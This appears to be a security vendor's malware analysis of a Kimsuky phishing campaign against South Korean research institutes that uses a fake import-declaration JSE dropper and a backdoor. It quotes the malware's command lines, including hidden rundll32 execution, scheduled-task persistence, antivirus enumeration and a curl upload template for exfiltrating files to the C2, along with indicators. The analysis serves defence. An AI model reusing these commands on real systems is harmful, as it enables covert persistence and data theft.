Kimsuky Targets South Korean Research Institutes with Fake Import Declaration

AhnLab Security Emergency response Center (ASEC) has recently identified that the Kimsuky threat group is distributing a malicious JSE file disguised as an import declaration to research institutes in South Korea. The threat actor ultimately uses a backdoor to steal information and execute commands.

The file name of the dropper disguised as an import declaration is as follows.

• Import Declaration_Official Stamp Affixed.jse

The file contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a legitimate PDF file.

A legitimate PDF file is saved under the file name ‘Import Declaration.PDF’ and automatically executed by the PowerShell script. This file contains the attack target’s information. Creating and executing a legitimate PDF file is likely done to prevent users from recognizing that a malicious backdoor file is being executed in the process.

In the background, a backdoor is created in the %ProgramData% path under the file name ‘vuVvMKg.i3IO’, and the malware is run using rundll32.exe.

• powershell.exe -windowstyle hidden rundll32.exe ProgramData\\vuVuMKg.i3IO UpdateSystem

The malware copies itself into the %ProgramData% and %Public% paths under the file name ‘IconCache.db’ for persistence before registering itself to the task scheduler.

• cmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:\Programdata\IconCache.db UpdateSystem /sc onlogon /rl highest /f

To exfiltrate system information, the backdoor uses the wmic command to check the anti-malware status of the attack target and collects network information through the ipconfig command.

• cmd.exe /U /c wimc /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt
• ipconfig /all

Afterwards, information such as the host name, user name, and OS information is collected. For the malware to avoid detection, it encodes the command execution results and sends them to the C2.

Also, the following commands (including system information exfiltration) are run, behaving as a backdoor in the affected system. Additionally, the curl tool is used to upload information to the C2 server.

• getinfo: System information
• die: Terminate
• where: Execution path
• run: Run certain files and commands
• curl -k -F “fileToUpload=@%s” -F “id=%S” %s

Because the bait file is also run, users cannot recognize that their systems are infected by malware. As these types of malware mainly attack specific targets, users should refrain from running attachments in emails sent from unknown sources.

[File Detection]

• Dropper/JS.Generic (2023.11.16.02)
• Backdoor/Win.Nikidoor (2023.11.15.03)

[IOC]

• MD5
  d2335df6d17fc7c2a5d0583423e39ff8
  d6abeeb469e2417bbcd3c122c06ba099
• C2
  hxxp://rscnode.dothome.co[.]kr/index.php
  hxxp://rscnode.dothome.co[.]kr/upload.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.